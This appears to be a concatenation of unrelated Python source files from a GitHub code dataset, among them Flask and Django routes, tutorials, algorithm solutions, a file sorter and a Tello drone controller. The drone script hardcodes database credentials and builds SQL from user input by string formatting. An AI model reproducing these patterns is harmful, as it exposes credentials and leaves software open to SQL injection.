flaskify(logic.get_employee(employee_id))\n\n\n@app.route(\n configs.BASE_PATH + '/department/', methods=['DELETE'])\n@validator.authorization(request)\ndef delete_department(department_id):\n \"\"\"Delete the department details against the given department id.\n :param department_id: str - Unique identification of department.\n :return: Success message on delete department details.\n \"\"\"\n return flaskify(logic.delete_department(department_id))\n\n\n@app.route(\n configs.BASE_PATH + '/employee/', methods=['DELETE'])\n@validator.authorization(request)\ndef delete_employee(employee_id):\n \"\"\"Delete the employee details against the given employee id.\n :param employee_id: str - Unique identification of employee.\n :return: Success message on delete employee details.\n \"\"\"\n return flaskify(logic.delete_employee(employee_id))\n\n\n@app.route(\n configs.BASE_PATH + '/department', methods=['POST'])\n@validator.authorization(request)\ndef post_department():\n \"\"\"Add the department details.\n :param: request json - Request body.\n :return: Department details added against the given data.\n \"\"\"\n return flaskify(logic.post_department(request.get_json()))\n\n\n@app.route(\n configs.BASE_PATH + '/employee', methods=['POST'])\n@validator.authorization(request)\ndef post_employee():\n \"\"\"Add an employee details.\n :param: request json - Request body.\n :return: Employee details added against the given data.\n \"\"\"\n return flaskify(logic.post_employee(request.get_json()))\n\n\n@app.route(\n configs.BASE_PATH + '/department/', methods=['PUT'])\n@validator.authorization(request)\ndef put_department(department_id):\n \"\"\"Update the department details against the given department id.\n :param department_id: str - Unique identification of department.\n :return: Success message on update of department details.\n \"\"\"\n return flaskify(logic.put_department(department_id, request.get_json()))\n\n\n@app.route(\n configs.BASE_PATH + '/employee/', methods=['PUT'])\n@validator.authorization(request)\ndef put_employee(employee_id):\n \"\"\"Update the employee details against the given employee id.\n :param employee_id: str - Unique identification of employee.\n :return: Success message on update of employee details.\n \"\"\"\n return flaskify(logic.put_employee(employee_id, request.get_json()))\n\n\n@app.route(\n configs.BASE_PATH + '/department', methods=['GET'])\n@validator.authorization(request)\ndef get_departments():\n \"\"\"Get the departments detail.\n :return: Departments detail.\n \"\"\"\n filter_data = {\n 'page': request.args.get('page') or 1,\n 'page_size':\n request.args.get('page_size') or constants.DEFAULT_PAGE_SIZE,\n 'sort_by': request.args.get('sort_by') or None,\n 'order_by': request.args.get('order_by') or None,\n 'search_by': request.args.get('search_by') or None,\n 'search_for': request.args.get('search_for') or None\n }\n return flaskify(logic.get_departments(filter_data))\n\n\n@app.route(\n configs.BASE_PATH + '/employee', methods=['GET'])\n@validator.authorization(request)\ndef get_employees():\n \"\"\"Get the employees detail.\n :return: Employees detail.\n \"\"\"\n filter_data = {\n 'page': request.args.get('page') or 1,\n 'page_size':\n request.args.get('page_size') or constants.DEFAULT_PAGE_SIZE,\n 'sort_by': request.args.get('sort_by') or None,\n 'order_by': request.args.get('order_by') or None,\n 'search_by': request.args.get('search_by') or None,\n 'search_for': request.args.get('search_for') or None\n }\n return flaskify(logic.get_employees(filter_data))\n","repo_name":"omkar-hardwell/flask-crud-api","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5392,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"28688759938","text":"# 변수 : 값을 저장하는 공간\n# 주석 : 코드 내에 포함 되어 있지만 실제로 실행 되지 않음\n# ex. 반려 동물을 소개해 주세요\nanimal = \"고양이\"\nname = \"해피\"\nage = 4\nhobby = \"낮잠\"\nis_adult = age >= 3\n\n# 여러 문장을 주석 처리하고자 할 경우\n'''\n작은 따옴표 3개를 입력 하면 여러 문장을 한 번에 주석 처리\n'''\n\n# 여러 줄의 코드 한꺼번에 주석 처리/해제할 때 단축키 : 코드들 드래그 후 Ctrl + /\nprint(\"우리집 \" + animal + \"의 이름은 \" + name + \"예요\")\n# 동일한 이름의 변수가 아랫쪽에 있는 경우, 아랫쪽에 입력된 값이 반영됨\nhobby = \"공놀이\"\nprint(name + \"는 \" + str(age) + \"살이며, \" + hobby + \"을 아주 좋아해요\")\n# int, boolean 형은 str()로 감싸줘야 출력 가능\n# 문자열과 변수 사이 , 사용하면 자동적으로 1칸씩 띄워줌\nprint(name, \"는 \", str(age), \"살이며, \", hobby, \"을 아주 좋아해요\")\nprint(name + \"는 어른일까요? \" + str(is_adult))\n\n\n","repo_name":"gPdbs2/TIL","sub_path":"나도코딩 Python 기본/1. 자료형/4,5. 변수, 주석.py","file_name":"4,5. 변수, 주석.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"70694160161","text":"from django.urls import path \nfrom . import views\n\nurlpatterns = [\n path('login/',views.LoginInterfaceView.as_view(),name='login'),\n path('register/',views.SignupView.as_view(),name='register'),\n path('logout/', views.logoutUser, name='logout'),\n\n\n path('', views.home, name='home'),\n path('cart/', views.cart, name='cart'),\n path('checkout/', views.checkout, name='checkout'),\n path('update_item/', views.updateItem, name='update_item'),\n]","repo_name":"bonface221/E-commerce","sub_path":"base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25377590454","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn,m = map(int, input().split())\r\n\r\ncost = []\r\nfor _ in range(m):\r\n [a, b] = map(int, input().split())\r\n cost.append([a,b])\r\n\r\nsix_list = sorted(cost, key=lambda x: x[0])\r\none_list = sorted(cost, key=lambda x: x[1])\r\n\r\nresult = 0\r\nif six_list[0][0] <= one_list[0][1] * 6:\r\n result = six_list[0][0] * (n // 6) + (n % 6) * one_list[0][1]\r\n if (n % 6) * one_list[0][1] > six_list[0][0]:\r\n result = six_list[0][0] * ((n // 6)+1)\r\nelse:\r\n result = one_list[0][1] * n\r\n\r\nprint(result)\r\n\r\n# 다른 방법\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nn,m = map(int, input().split())\r\n\r\nsix_list = []\r\none_list = []\r\nfor _ in range(m):\r\n [a, b] = map(int, input().split())\r\n six_list.append(int(a))\r\n one_list.append(int(b))\r\n\r\nsix = min(six_list)\r\none = min(one_list)\r\n\r\n# 이하 동문\r\n","repo_name":"noxknow/Python-Coding_test","sub_path":"02. 그리디 알고리즘/1049 기타줄.py","file_name":"1049 기타줄.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6873941253","text":"import sys\n\n# 예외 처리 방법\nwhile True:\n try:\n n = list(map(int, input().split()))\n print(sum(n))\n except:\n break\n\n# readlines() 사용\nlines = sys.stdin.readlines()\nfor line in lines:\n num = list(map(int,line.split()))\n print(sum(num))","repo_name":"saevyeokvyeol/python_algorithm_study","sub_path":"yuda/Iteration/0704_10951.py","file_name":"0704_10951.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24610502109","text":"import re\nfrom django.core import validators\nfrom django.utils.translation import ugettext_lazy as _\nfrom horizon import exceptions, forms, messages\nfrom horizon.utils import fields\nfrom cnext_api import api\nfrom cnext.resource import provider_keypairs_choices,region_keypairs_choices\nfrom mongoengine.django.mongo_auth.models import get_user_document\n\nNEW_LINES = re.compile(r\"\\r|\\n\")\n\nclass Regionlist():\n def __init__(self, provider, region):\n self.name = region\n self.provider = provider\n self.region = region\n\n\nclass CreateKeypair(forms.SelfHandlingForm):\n\n name = forms.CharField(max_length=\"20\",\n label=_(\"Keypair Name\"),\n validators=[validators.validate_slug],\n error_messages={'invalid': _('Keypair names may '\n 'only contain letters, numbers, underscores '\n 'and hyphens.')})\n key_provider_list = forms.ChoiceField(\n label=_(\"Providers List\"),\n required=True,\n )\n key_region_list = forms.ChoiceField(\n label=_(\"Regions List\"),\n required=True,\n widget=fields.SelectWidget(data_attrs=('provider', 'region', ),\n transform=lambda x: (\"%s \" % (x.name)))\n )\n\n def handle(self, request, data):\n return True # We just redirect to the download view.\n def __init__(self, request, *args, **kwargs):\n forms.SelfHandlingForm.__init__(self, request, *args, **kwargs)\n provider_list = api.providers(self.request)\n region_list = api.region(self.request)\n p = [(\"\", _(\"Select Provider\"))]\n for provider in provider_list:\n if provider.provider in provider_keypairs_choices:\n p.append((provider.provider.lower(),provider.provider))\n t = tuple(p)\n tuple_providers = t\n self.fields['key_provider_list'].choices = tuple_providers\n r = [(\"\", _(\"Select Region\"))]\n for region in region_list:\n if region.name in region_keypairs_choices:\n r.append((region.name,Regionlist(region.provider,region.name)))\n r = tuple(r)\n tuple_regions = r\n self.fields['key_region_list'].choices = tuple_regions\n\n\nclass ImportKeypair(forms.SelfHandlingForm):\n name = forms.CharField(max_length=\"20\", label=_(\"Keypair Name\"),\n validators=[validators.RegexValidator('\\w+')])\n public_key = forms.CharField(label=_(\"Public Key\"), widget=forms.Textarea)\n\n def handle(self, request, data):\n try:\n # Remove any new lines in the public key\n data['public_key'] = NEW_LINES.sub(\"\", data['public_key'])\n keypair = api.keypairs(request)\n messages.success(request, _('Successfully imported public key: %s')\n % data['name'])\n return keypair\n except Exception:\n exceptions.handle(request, ignore=True)\n self.api_error(_('Unable to import keypair.'))\n return False\n\nclass AccountChangeForm(forms.SelfHandlingForm):\n accounts_list=[]\n def __init__(self, *args, **kwargs):\n accounts_list = kwargs[\"initial\"][\"account_choices\"]\n super(AccountChangeForm, self).__init__(*args,**kwargs) \n self.fields['account_name'] = forms.ChoiceField(label=\"Account Name\", choices=accounts_list)\n \n account_name = forms.ChoiceField(label=_(\"Account Name\"),\n required=True,\n choices = accounts_list,\n help_text=_(\"Select your account\"))\n \n def handle(self, request, data):\n user = get_user_document().objects(username=request.user.username).first()\n cnext_clouds = sum([[y.cloudid for y in i.policy if \n y.cloudid.platform == \"Cnext\"] for i in request.user.roles], [])\n for cloud in cnext_clouds:\n if str(cloud.id) == str(data['account_name']):\n user.cnextpublickey = cloud[\"cloud_meta\"][\"publickey\"]\n user.cnextprivatekey = cloud[\"cloud_meta\"][\"privatekey\"]\n user.cnextendpoint = cloud[\"cloud_meta\"][\"endpoint\"]\n user.cnextname = cloud[\"name\"]\n user.save()\n return True\n return False\n","repo_name":"CloudenablersPvtLtd/HybridHorizon","sub_path":"cnext/keypairs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14356332402","text":"class Person:\n def __init__(self, n=\"Name\", s=\"Surname\"):\n self.name = n\n self.surname = s\n\np1 = Person(\"Bill\",\"Ross\")\nprint(p1.name, p1.surname)\np2 = Person(\"123\", \"321\")\nprint(p2.name, p2.surname)\np3 = Person()\nprint(p3.name, p3.surname)","repo_name":"ogogost/sandbox","sub_path":"class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"766906942","text":"from sklearn.metrics import confusion_matrix\nimport pandas as pd \nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef plot_confusion(ys, y_hts):\n '''\n function which returns figure of confusion matrix\n '''\n confusion_array = confusion_matrix(ys, y_hts)\n df_cm = pd.DataFrame(confusion_array, index = ['Negative', 'Postive'],\n columns = ['Negative', 'Positive'])\n fig, ax = plt.subplots(figsize = (10,7))\n ax = sns.heatmap(df_cm, annot=True)\n ax.set_xlabel('Predictions')\n ax.set_ylabel('Actual')\n return fig\n\n\nif __name__ == '__main__':\n ys = [1,0,1]\n yhts = [1,0,1]\n\n fig = plot_confusion(ys, yhts)\n fig.savefig('experiment.png')\n","repo_name":"harrygcoppock/covid_cross_datasets","sub_path":"utils/confusion_matrix.py","file_name":"confusion_matrix.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"19668684146","text":"import os.path\nimport shutil\nfrom random import randint\nfrom os import listdir, rename\nfrom os.path import isfile, join\nfrom extensions import FILE_EXTENSIONS\n\n\nclass FileManager:\n\n def __init__(self, dir_roots: list, target_root: str, logger):\n self.dir_roots = dir_roots\n self.target_root = target_root\n self.logg = logger\n\n @staticmethod\n def get_all_files(root_dir: str):\n only_files = [f for f in listdir(root_dir) if isfile(join(root_dir, f)) and not f.startswith('.') and not f.startswith('~')]\n return only_files\n\n def get_file_extension(self, filename: str):\n index = [i for i, c in enumerate(filename) if c == '.'][-1]\n return filename[index + 1:]\n\n def cleaner(self, files: list, source_root: str):\n for filename in files:\n ext_of_file = self.get_file_extension(filename)\n\n if ext_of_file in FILE_EXTENSIONS['pdf']:\n self.move_file_to_folder(source_root, filename, 'PDF')\n\n elif ext_of_file in FILE_EXTENSIONS['image']:\n self.move_file_to_folder(source_root, filename, 'Image')\n\n elif ext_of_file in FILE_EXTENSIONS['music']:\n self.move_file_to_folder(source_root, filename, 'Music')\n\n elif ext_of_file in FILE_EXTENSIONS['video']:\n self.move_file_to_folder(source_root, filename, 'Video')\n\n elif ext_of_file in FILE_EXTENSIONS['shell']:\n self.move_file_to_folder(source_root, filename, 'Shell')\n\n elif ext_of_file in FILE_EXTENSIONS['word']:\n self.move_file_to_folder(source_root, filename, 'Word')\n\n def move_file_to_folder(self, source_root: str, filename: str, foldername: str):\n \"\"\"\n Check if target folder already exists. If not, create it.\n Check if file already exists in target folder, if not move the file to the folder,\n if it exists, rename the source file and move to target folder.\n \"\"\"\n\n self.create_dir_if_not_exist(foldername)\n\n if not self.check_if_filename_exists(filename, join(self.target_root, foldername)):\n shutil.move(join(source_root, filename), join(self.target_root, foldername))\n self.logg.info(f\"{foldername} file moved\")\n else:\n self.logg.info(f\"{filename} already exists in {foldername} folder\")\n filename = self.rename_file(filename, source_root)\n self.logg.info(f\"Renamed to {filename} and moved to {foldername} folder\")\n\n @staticmethod\n def rename_file(filename: str, source_root: str):\n name, extension = filename.split(\".\")\n new_filename = name + '_.' + extension\n rename(join(source_root, filename), join(source_root, new_filename))\n\n return new_filename\n\n def create_dir_if_not_exist(self, folder_name):\n if not os.path.exists(join(self.target_root, folder_name)):\n self.logg.info(f\"{folder_name} folder created\")\n os.makedirs(join(self.target_root, folder_name))\n\n def check_if_filename_exists(self, filename: str, folder_path: str):\n if filename in self.get_all_files(folder_path):\n return True\n\n return False\n\n def run(self):\n for dir_root in self.dir_roots:\n files = self.get_all_files(dir_root)\n\n if files:\n self.cleaner(files, dir_root)","repo_name":"alangraf/file_manager","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73366035680","text":"import os\nimport boto3\nimport pygame\nimport pymysql\nfrom djitellopy import Tello\nfrom datetime import datetime\nfrom random import *\nfrom dotenv import find_dotenv, load_dotenv\nfrom db.dynamo_db import DroneDb\n\n# input fields status color\nname_color = None\nemail_color = None\ndepartment_color = None\n\n# user input Fields\nuser_email = pygame.Rect\nuser_name = pygame.Rect\nuser_department = pygame.Rect\nsubmit_button = pygame.Rect\n\n# checker if user has submitted information\nuser_info = False\n\n# controller values to move drone\ncontroller = None\nup_down = 0\nleft_right = 0\nforward_backward = 0\nyaw = 0\n\n# finding environment variable\ndotenv_path = find_dotenv()\nload_dotenv(dotenv_path)\n\n# dynamodb references\nclient = boto3.client(\n 'dynamodb',\n aws_access_key_id=os.getenv('DB_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('DB_SECRET_ACCESS_KEY_ID'),\n region_name='us-east-1'\n)\n\ndynamodb = boto3.resource(\n 'dynamodb',\n aws_access_key_id=os.getenv('DB_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('DB_SECRET_ACCESS_KEY_ID'),\n region_name='us-east-1'\n)\n\nddb_exceptions = client.exceptions\n\n\n# This is a class we are going to use to print the user prompts\nclass UserInputPrint(object):\n def __init__(self):\n self.line_height = None\n self.y = None\n self.x = None\n self.reset()\n self.font = pygame.font.Font(None, 20)\n\n def print_prompt(self, view, prompt):\n text = self.font.render(prompt, True, WHITE)\n view.blit(text, (self.x, self.y))\n self.y += self.line_height\n\n def reset(self):\n self.x = 10\n self.y = 10\n self.line_height = 20\n\n\n# We are going to use this class to render input fields in the screen\nclass Input(UserInputPrint):\n def __init__(self):\n super().__init__()\n self.border = 2\n self.name_active = False\n self.email_active = False\n self.department_active = False\n self.name_input = ''\n self.email_input = ''\n self.department_input = ''\n self.flight_id = None\n self.flight_time = None\n\n # Render user input coming from keyboard\n\n def render_input(self, view, rectangle, color, text):\n self.x += 10\n self.y += 10\n pygame.draw.rect(view, color, rectangle, self.border)\n text_surface = user.font.render(text, True, WHITE)\n screen.blit(text_surface, (rectangle.x + 5, rectangle.y + 5))\n self.x -= 10\n self.y += 50\n\n # Render the button to submit the information\n\n def render_button(self, view, rectangle, color, text):\n self.x += 50\n self.y += 10\n pygame.draw.rect(view, color, rectangle)\n text_surface = user.font.render(text, True, BLACK)\n screen.blit(text_surface, (rectangle.x + 5, rectangle.y + 5))\n\n\n# class for XBOX controller button mapping\nclass XboxController:\n # Buttons\n TAKEOFF = 5\n LAND = 4\n\n # Joysticks\n LEFT_Y = 1 # forward -1 backwards 1\n LEFT_X = 0 # Left -1 Right 1\n RIGHT_Y = 3 # up -1 down 1\n RIGHT_X = 2 # Rotate left -1 Rotate right 1\n\n LEFT = -1\n UP = -1\n ROTATE_LEFT = -1\n FORWARD = -1\n\n # Joystick still have input if not moved\n DEAD_ZONE = 0.06\n\n # Controller is output is inverted by default\n INVERTED = -1\n\n\n# Define some colors.\nBLACK = pygame.Color('black')\nWHITE = pygame.Color('white')\n\n\n# This is a simple class that will help us print to the view.\nclass DroneInfoPrint(object):\n def __init__(self):\n self.line_height = None\n self.y = None\n self.x = None\n self.reset()\n self.font = pygame.font.Font(None, 20)\n\n def tprint(self, view, text_string):\n text_bitmap = self.font.render(text_string, True, BLACK)\n view.blit(text_bitmap, (self.x, self.y))\n self.y += self.line_height\n\n def reset(self):\n self.x = 10\n self.y = 10\n self.line_height = 15\n\n def indent(self):\n self.x += 10\n\n def unindent(self):\n self.x -= 10\n\n\n# This displays what the controller is making the drone do along with some extra data that the drone is sending back\ndef display_controller_input():\n # Get the name from the OS for the controller/joystick.\n global controller\n global up_down\n global left_right\n global forward_backward\n global yaw\n\n name = joystick.get_name() # get the name of the controller\n droneInfoPrint.tprint(screen, \"Joystick name: {}\".format(name))\n\n # If name of controller matches the string use xbox button mapping class\n if name == 'Controller (Xbox One For Windows)':\n controller = XboxController\n\n try:\n guid = joystick.get_guid()\n except AttributeError:\n # get_guid() is an SDL2 method\n pass\n else:\n droneInfoPrint.tprint(screen, \"GUID: {}\".format(guid))\n\n # printing drone liver status attributes into the screen\n battery = tello.get_battery()\n flight_time = tello.get_flight_time()\n temperature = tello.get_temperature()\n altitude = tello.get_height()\n droneInfoPrint.tprint(screen, \"Drone Info:\")\n droneInfoPrint.indent()\n droneInfoPrint.tprint(screen, \"Battery ----> {}\".format(battery))\n droneInfoPrint.tprint(screen, \"Flight Time ----> {}s\".format(flight_time))\n droneInfoPrint.tprint(screen, \"Temperature ----> {}\".format(temperature))\n droneInfoPrint.tprint(screen, \"Altitude ----> {}\".format(altitude))\n droneInfoPrint.unindent()\n\n # Usually axis run in pairs, up/down for one, and left/right for\n # the other.\n axes = joystick.get_numaxes()\n droneInfoPrint.tprint(screen, \"Drone Movement:\")\n droneInfoPrint.indent()\n\n # Printing the drone movement along with giving commands to drone using joysticks\n for num in range(axes):\n axis = joystick.get_axis(num)\n if num == controller.LEFT_X:\n if axis < (0 - controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Left: {:.0f}\".format(axis * 100))\n\n left_right = int(axis * 100)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif axis > (0 + controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Right: {:.0f}\".format(axis * 100))\n\n left_right = int(axis * 100)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif num == controller.LEFT_Y:\n if axis < (0 - controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Forward: {:.0f}\".format((axis * 100) * controller.INVERTED))\n\n forward_backward = int((axis * 100) * controller.INVERTED)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif axis > (0 + controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Backwards: {:.0f}\".format((axis * 100) * controller.INVERTED))\n\n forward_backward = int((axis * 100) * controller.INVERTED)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif num == controller.RIGHT_X:\n if axis < (0 - controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Yaw: {:.0f}\".format(axis * 100))\n\n yaw = int(axis * 100)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif axis > (0 + controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Yaw: {:.0f}\".format(axis * 100))\n\n yaw = int(axis * 100)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif num == controller.RIGHT_Y:\n if axis < (0 - controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Up: {:.0f}\".format((axis * 100) * controller.INVERTED))\n\n up_down = int((axis * 100) * controller.INVERTED)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif axis > (0 + controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Down: {:.0f}\".format((axis * 100) * controller.INVERTED))\n\n up_down = int((axis * 100) * controller.INVERTED)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n droneInfoPrint.unindent()\n\n # Getting the buttons reference from the controller\n buttons = joystick.get_numbuttons()\n droneInfoPrint.tprint(screen, \"Drone Status:\")\n droneInfoPrint.indent()\n\n # listening for any take off or land commands from the controller using the bumpers\n for input_ in range(buttons):\n button = joystick.get_button(input_)\n if input_ == controller.TAKEOFF:\n if button == 1:\n droneInfoPrint.tprint(screen, \"Taking Off....\")\n tello.takeoff()\n if input_ == controller.LAND:\n if button == 1:\n response = tello.send_command_with_return('land', timeout=7)\n droneInfoPrint.tprint(screen, \"Landing......\")\n\n if 'ok' in response.lower():\n table.insert_item(user.flight_id, flight_time, user.name_input, user.email_input,\n user.department_input)\n sql = '''insert into pilot_flights (flight_id, pilot_name, email_address, department, \n flight_time) values ('%s', '%s', '%s', '%s', %s)''' % (user.flight_id, user.name_input,\n user.email_input,\n user.department_input, flight_time)\n print(sql)\n cursor.execute(sql)\n rds.commit()\n\n droneInfoPrint.unindent()\n\n\n# Activating input fields if user clicks into one and blocking the fields if user clicks on somthing else, also it will\n# store whatever the user typed into variables\ndef user_input():\n # colors for textBoxes to display between active or inactive\n color_active = pygame.Color('lightskyblue3')\n color_passive = pygame.Color('gray15')\n\n global name_color\n global email_color\n global department_color\n global user_info\n\n # setting color values depending on if they are active or not\n if user.department_active:\n department_color = color_active\n else:\n department_color = color_passive\n\n if user.name_active:\n name_color = color_active\n else:\n name_color = color_passive\n\n if user.email_active:\n email_color = color_active\n else:\n email_color = color_passive\n\n # activating or deactivating input fields when clicked\n if event.type == pygame.MOUSEBUTTONDOWN:\n if user_name.collidepoint(event.pos):\n user.name_active = True\n else:\n user.name_active = False\n\n if user_email.collidepoint(event.pos):\n user.email_active = True\n else:\n user.email_active = False\n\n if user_department.collidepoint(event.pos):\n user.department_active = True\n else:\n user.department_active = False\n\n if submit_button.collidepoint(event.pos):\n user.flight_id = generate_flight_id()\n user_info = True\n print(\"name: {} Email: {} Department: {} Flight_ID: {}\".format(user.name_input, user.email_input,\n user.department_input, user.flight_id))\n\n # Storing user information in variables\n if event.type == pygame.KEYDOWN:\n if user.name_active:\n if event.key == pygame.K_BACKSPACE:\n user.name_input = user.name_input[:-1]\n else:\n user.name_input += event.unicode\n\n if user.email_active:\n if event.key == pygame.K_BACKSPACE:\n user.email_input = user.email_input[:-1]\n else:\n user.email_input += event.unicode\n\n if user.department_active:\n if event.key == pygame.K_BACKSPACE:\n user.department_input = user.department_input[:-1]\n else:\n user.department_input += event.unicode\n\n\n# Rendering the hole user input interface\ndef render_userinput():\n global user_email\n global user_name\n global user_department\n global submit_button\n\n # Rendering Prompts to user\n user.print_prompt(screen, \"Name:\")\n user_name = pygame.Rect(user.x, user.y, 240, 32)\n user.render_input(screen, user_name, name_color, user.name_input)\n\n user.print_prompt(screen, \"Email\")\n user_email = pygame.Rect(user.x, user.y, 240, 32)\n user.render_input(screen, user_email, email_color, user.email_input)\n\n user.print_prompt(screen, \"Department\")\n user_department = pygame.Rect(user.x, user.y, 240, 32)\n user.render_input(screen, user_department, department_color, user.department_input)\n\n submit_button = pygame.Rect(user.x, user.y, 100, 22)\n user.render_button(screen, submit_button, pygame.Color('white'), 'Submit')\n\n\n# generating a flight id\ndef generate_flight_id():\n flight_id = datetime.today().strftime('%Y-%m-%d')\n flight_id += \".\"\n flight_id += str(randint(0, 1000))\n\n return flight_id\n\n\n# initializing pygame\npygame.init()\n\n# Set the width and height of the view (width, height).\nscreen = pygame.display.set_mode((1000, 1000))\n\npygame.display.set_caption(\"Drone_View\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Keep view black with user input until user is done submitting information\nuser = Input()\n\n# Used to manage how fast the view updates.\nclock = pygame.time.Clock()\n\n# Initialize the joysticks.\npygame.joystick.init()\n\n# Get ready to print.\ndroneInfoPrint = DroneInfoPrint()\n\n# tello drone object\ntello = Tello()\n\n# connect to tello\ntello.connect()\n\n# dynamodb table object\ntable = DroneDb(dynamodb)\n\n# connection instance of rds\nrds = pymysql.connect(host='drone-flights-data.cahojfeljvlq.us-east-1.rds.amazonaws.com',\n user='admin',\n password='admin123')\n# used to execute commands to rds\ncursor = rds.cursor()\n\n# using database\nusing_sql = '''use drone_flights'''\ncursor.execute(using_sql)\n\n# -------- Main Program Loop -----------\nwhile not done:\n\n for event in pygame.event.get(): # User did something.\n if event.type == pygame.QUIT: # If user clicked close.\n done = True\n user_input()\n\n # First, clear the view to white. Don't put other drawing commands\n # above this, or they will be erased with this command.\n if not user_info:\n screen.fill(BLACK)\n user.reset()\n render_userinput()\n else:\n screen.fill(WHITE)\n droneInfoPrint.reset()\n\n # Get count of joysticks.\n joystick_count = pygame.joystick.get_count()\n\n # For each joystick:\n for i in range(joystick_count):\n joystick = pygame.joystick.Joystick(i)\n joystick.init()\n\n display_controller_input()\n\n pygame.display.flip()\n\n # Limit to 20 frames per second.\n clock.tick(60)\n\npygame.quit()\n","repo_name":"JeanCarlosVal/Tello_Drone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72944759522","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\n#import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nfrom PIL import Image\nimport math\nfrom decimal import Decimal, ROUND_HALF_UP\n\ndef gradient(k):\n image = cv2.imread(\"S.JPG\")\n image = cv2.blur(image,(2*k+1, 2*k+1))\n cv2.imwrite('S_.JPG', image)\n height, width = image.shape[:2]\n\n image = Image.open(\"S_.JPG\")\n image_data = image.getdata()\n g = [[[0] * 2 for i in range(height)] for j in range(width)]\n for x in range(k, width - k):\n print(x)\n for y in range(k, height - k):\n g_vector = 0.0\n for w in range(8):\n p = math.cos(math.radians(22.5 * w)) * k\n q = math.sin(math.radians(22.5 * w)) * k\n\n p = Decimal(str(p))\n q = Decimal(str(q))\n\n int_p = int(p.quantize(Decimal('0'), rounding=ROUND_HALF_UP))\n int_q = int(q.quantize(Decimal('0'), rounding=ROUND_HALF_UP))\n\n g_p = np.array(p, dtype='u8')\n g_q = np.array(q, dtype='u8')\n\n g_vector = image_data[(y + int_q) * width + (x + int_p)] - image_data[(y - int_q) * width + (x - int_p)]\n g[x][y][0] += g_vector * int_p\n g[x][y][1] += g_vector * int_q\n\n '''\n if g_x == 0:\n g[x][y] = 90\n else:\n g[x][y] = math.degrees(math.atan(g_y / g_x))\n '''\n \n return g","repo_name":"UmiKumo/grape","sub_path":"Roscher/廃棄ソース/def_ridge2a.py","file_name":"def_ridge2a.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6521852598","text":"from odoo import models, fields, api\n\n\nclass DeliverySlot(models.Model):\n \"\"\" Model to create delivery slots\"\"\"\n _name = 'delivery.slot'\n _rec_name = 'delivery_date'\n\n delivery_date = fields.Date('Delivery Date')\n slot = fields.Many2one('slot.time', string=\"slot\")\n product_id = fields.Many2one('product.product', string=\"Product\")\n sale_order = fields.Many2one('sale.order')\n delivery_ids = fields.One2many('sale.order', 'slot_id',\n compute='_compute_sale_ids')\n delivery_limit = fields.Integer(\"Delivery Limit\", default=100)\n total_delivery = fields.Integer(\"Total No of Deliveries\",\n compute='_onchange_delivery_ids',\n stote=True)\n remaining_slots = fields.Integer(\"Available No of Deliveries\",\n compute='_onchange_total_delivery')\n active = fields.Boolean('Active', default=True)\n\n @api.onchange('delivery_ids')\n def _onchange_delivery_ids(self):\n \"\"\"sets the total deliveries of the delivery slot\"\"\"\n self.total_delivery = len(self.delivery_ids)\n\n @api.onchange('total_delivery', 'delivery_limit')\n def _onchange_total_delivery(self):\n \"\"\"Finds remaining slots for each of the delivery slot\"\"\"\n self.remaining_slots = self.delivery_limit - self.total_delivery\n if self.remaining_slots <= 0:\n self.active = False\n\n def _compute_sale_ids(self):\n \"\"\"Computing the related sale orders of each delivery slot\"\"\"\n for rec in self:\n sale_order = self.env['sale.order'].search(\n [('slot_per_product', '=', True)])\n for order in 